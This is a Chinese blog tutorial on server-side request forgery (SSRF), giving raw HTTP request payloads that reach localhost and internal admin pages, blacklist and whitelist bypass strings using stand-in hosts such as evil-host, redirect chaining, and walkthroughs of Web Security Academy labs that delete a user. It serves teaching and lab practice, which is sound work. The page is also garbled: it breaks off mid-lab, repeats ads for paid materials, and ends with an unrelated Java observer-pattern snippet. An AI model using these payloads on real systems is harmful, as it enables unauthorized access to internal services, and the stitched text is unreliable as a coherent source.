我说话你不信,那就让你girl friend说,看你信不信~WEB安全基础入门—服务器端请求伪造(3)

img
img

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!


举例来说,购物程序允许用户查询某商品库存量,这个功能通过前端发送URL调用后端服务器的REST API来完成查询。通常HTTP如下:



POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1



后端服务器查询结果后,将信息状态和数量返回给用户。但攻击者可尝试利用此点构造针对服务器自身的SSRF攻击,如下:



POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://localhost/admin



后端服务器会获取/admin的页面,并将内容返还给用户。


正常情况下,攻击者直接访问`/admin`,因访问权限控制会被拒绝。但是服务器访问自身系统上运行的业务/admin页面,往往不受限制。就这样攻击者就简单的绕过了安全防护。这是SSRF最标准的攻击流程。



> 
> 例题 1
> 
> 
> 



> 
> 在这种信任关系中,来自本地计算机的请求的处理方式与普通请求不同。基于如下几点因素,使后端存在这种信任关系。
> 
> 
> * 访问控制检查可能都在前面的不同组件中实现。与服务器本身建立连接时,检查被绕过
> * 出于灾难恢复的目的,应用程序可能允许来自本地计算机的任何用户在不登录的情况下进行管理访问。 当然这种情况的前提是, 只有完全受信任的用户才会直接使用服务器本身。而攻击就是要打破这种种的假设前提。
> * 管理接口与主应用程序使用不同的端口号,因此对面向用户的端口设置了防护。但忽略了管理接口的防护。
> 
> 
> 


#### 2.2 针对后端其他系统的攻击


服务器能够与用户不能直接访问的其他后端系统交互。 通常这些后端系统使用外部不可以路由到的内网IP,所以安全防护比较薄弱。继续用上面的例子举例,如果/admin业务不在本地服务器,而是在另一台内网机器上(192.168.0.68),攻击荷载可改为



POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://192.168.0.68/admin



> 
> 例题 2
> 
> 
> 


### 3. 绕过常规的SSRF防御


#### 3.1 基于黑名单过滤的绕过


黑名单往往对127.0.0.1、localhost或类似/admin等敏感url进行过滤。绕过方法如下:


* 127.0.0.1的变形写法`127.1` `2130706433` `017700000001`
* 注册自己的域名,解析为127.0.0.1 可使用spoofed.burpCollaborator.net实现
* 敏感路径可使用`大小写混用/AdmIn``重写/adadminmin`混淆被过滤的字符串



> 
> 例题 3
> 
> 
> 


#### 3.2 基于白名单匹配的绕过


一些网站采用白名单进行匹配,命中的URL可通过。有时可测试包含白名单开头,或部分来匹配。主要还是利用对URL解析的不一致来绕过白名单,尤其是URL规范中常备忽略的功能。


* URL路径中使用@,前面表示登陆账户凭据


`https://expected-host@evil-host`


* URL路径中使用#,表示url锚点或片段


`https://evil-host#expected-host`


* 利用DNS命名层次结构


`https://expected-host.evil-host`


* 对URL部分进行URL编码以混淆解析
* 上述多种方式的混合使用



> 
> 例题 4
> 
> 
> 


#### 3.3 利用重定向绕过过滤


有时上面介绍的各种方法均不成功,可尝试查找目标应用中,是否可使用重定向绕过防护。示例如下:  
 `/product/nextProduct?currentProductId=6&path=http://evil-user.net`  
 网站解析支持重定向,解析结果为  
 `http://evil-user.net`  
 完整的SSRF攻击包实例如下:



POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin



> 
> 例题 5
> 
> 
> 


#### 3.4 盲注SSRF漏洞利用


原理与上面介绍的相同,唯一不同点就是响应结果,不再通过响应包返回至用户。导致无法直接获取敏感数据,或执行进一步的攻击。


* 使用外带技术(OAST)探测发现盲注SSRF漏洞


原理是,激发内网服务器向外部攻击者控制的域名发送HTTP请求,监控控制的域名下所有的流量,寻找是否有目标内网的交互。若存在,则证明存在SSRF潜在漏洞。  
 推荐使用工具Burp Collaborator,随机生成被使用者完全监测的域名,完成上述测试。


* 利用DNS lookup获取敏感信息


在控制的域名下插入子域名DNS lookup命令。一般内网会禁止服务器对外的任意网络链接,但往往会允许DNS流量通过(基础设施往往需要DNS服务),



> 
> 例题 6
> 
> 
> 


利用此种方法探测服务器本身或其他后端系统上的其他漏洞。您可以扫描内部IP地址空间,发送旨在检测已知漏洞的有效负载。如果这些有效负载还采用带外技术,那可能会在未打补丁的内部服务器上发现漏洞。



> 
> 例题 7
> 
> 
> 


### 4. 漏洞实例


#### 1. 针对服务器自身的基本SSRF攻击([Basic SSRF against the local server](https://bbs.csdn.net/topics/618545628))


* **目标**


通过修改库存查询的URL,访问到只有管理员才能访问的http://localhost/admin路径模块,并删除用户carlos


* **解题思路**
	1. 在查询库存量的流程中,发现数据包



POST /product/stock HTTP/1.1
Host: 0a03009503626052c08518b500aa008d.web-security-academy.net

stockApi=http%3a%2f%2flocalhost%2fadmin%2fdelete%3fusername%3dcarlos


2. 改下`stockApi=http%3a%2f%2flocalhost%2fadmin`得到在响应中发现/admin页面已返回,发现删除账户链接。


`<a href="/admin/delete?username=carlos">`


3. 接着构造数据包



POST /product/stock HTTP/1.1
Host: 0a03009503626052c08518b500aa008d.web-security-academy.net

stockApi=http%3a%2f%2flocalhost%2fadmin%2fdelete%3fusername%3dcarlos


#### 2. 针对其他后端系统的基本SSRF攻击([Basic SSRF against another back-end system](https://bbs.csdn.net/topics/618545628))


* **目标**


通过修改库存查询的URL,扫描192.168.0/24网段的8080端口,删除用户carlos


* **解题思路**
	1. 根据提示,将数据包`POST /product/stock`在192.168.0/24网段进行暴力破解,发现路径http://192.168.0.246:8080/admin  
	 ![在这里插入图片描述](https://img-blog.csdnimg.cn/d3662ebc94944e528227b839fd705547.png)  
	 后续操作与上题一致


#### 3. 使用SSRF攻击绕过黑名单的过滤([SSRF with blacklist-based input filter](https://bbs.csdn.net/topics/618545628))


* **目标**


通过修改库存查询的URL,访问到只有管理员才能访问的http://localhost/admin路径模块,并删除用户carlos  
 网站有SSRF安全防护需绕过


* **解题思路**


与第1题完全一样,仅是对localhost /admin有过滤限制,可使用大小写绕过。  
 `http://lOcAlHoSt/AdMin`


#### 4. 使用SSRF攻击绕过白名单的匹配([SSRF with whitelist-based input filter](https://bbs.csdn.net/topics/618545628))




![img](https://img-blog.csdnimg.cn/img_convert/9351a5fcbc91acd6ee1672caa1e41c5c.png)
![img](https://img-blog.csdnimg.cn/img_convert/7dd7ea580e737a59c875032b06b85b8b.png)
![img](https://img-blog.csdnimg.cn/img_convert/10e56f6db3c7ee2a7aa35dc5daaadf74.png)

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上大数据知识点,真正体系化!**

**由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**

**[需要这份系统化资料的朋友,可以戳这里获取](https://bbs.csdn.net/topics/618545628)**

15786913929)]
[外链图片转存中...(img-jwSDxQlj-1715786913929)]
[外链图片转存中...(img-8a4mTw5b-1715786913930)]

**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上大数据知识点,真正体系化!**

**由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**

**[需要这份系统化资料的朋友,可以戳这里获取](https://bbs.csdn.net/topics/618545628)**

  • 15
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
好的,我们可以在 Girl 类中增加一个方法来处理男孩们的提问: ```java class Girl { private List<Observer> observers = new ArrayList<>(); private String status = ""; // 其他方法省略 public void answerQuestion() { System.out.println("男孩们向女孩提问:你在干嘛?"); System.out.println("女孩回答:我不告诉你~"); } } ``` 然后在 Boy 类中调用该方法: ```java class Boy implements Observer { private String name; private Girl girl; public Boy(String name, Girl girl) { this.name = name; this.girl = girl; } // 其他方法省略 public void askQuestion() { System.out.println(name + "向女孩提问:你在干嘛?"); girl.answerQuestion(); } } ``` 注意,在 Boy 类中需要持有 Girl 对象的引用。 完整的示例代码如下: ```java import java.util.ArrayList; import java.util.List; interface Observer { void update(String status); } class Girl { private List<Observer> observers = new ArrayList<>(); private String status = ""; public void attach(Observer observer) { observers.add(observer); } public void detach(Observer observer) { observers.remove(observer); } public void notifyObservers() { for (Observer observer : observers) { observer.update(status); } } public void updateStatus(String status) { this.status = status; notifyObservers(); } public void answerQuestion() { System.out.println("男孩们向女孩提问:你在干嘛?"); System.out.println("女孩回答:我不告诉你~"); } } class Boy implements Observer { private String name; private Girl girl; public Boy(String name, Girl girl) { this.name = name; this.girl = girl; } @Override public void update(String status) { System.out.println(name + "收到了女孩的状态更新:" + status); } public void askQuestion() { System.out.println(name + "向女孩提问:你在干嘛?"); girl.answerQuestion(); } } public class Main { public static void main(String[] args) { // 创建一个女孩对象 Girl girl = new Girl(); // 创建三个男孩对象 Boy boy1 = new Boy("小明", girl); Boy boy2 = new Boy("小李", girl); Boy boy3 = new Boy("小张", girl); // 男孩们关注女孩 girl.attach(boy1); girl.attach(boy2); girl.attach(boy3); // 女孩更新状态,男孩们会收到通知 girl.updateStatus("我在看电影"); // 男孩们向女孩提问 boy1.askQuestion(); boy2.askQuestion(); boy3.askQuestion(); } } ``` 输出结果如下: ``` 小明收到了女孩的状态更新:我在看电影 小李收到了女孩的状态更新:我在看电影 小张收到了女孩的状态更新:我在看电影 小明向女孩提问:你在干嘛? 男孩们向女孩提问:你在干嘛? 女孩回答:我不告诉你~ 小李向女孩提问:你在干嘛? 男孩们向女孩提问:你在干嘛? 女孩回答:我不告诉你~ 小张向女孩提问:你在干嘛? 男孩们向女孩提问:你在干嘛? 女孩回答:我不告诉你~ ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值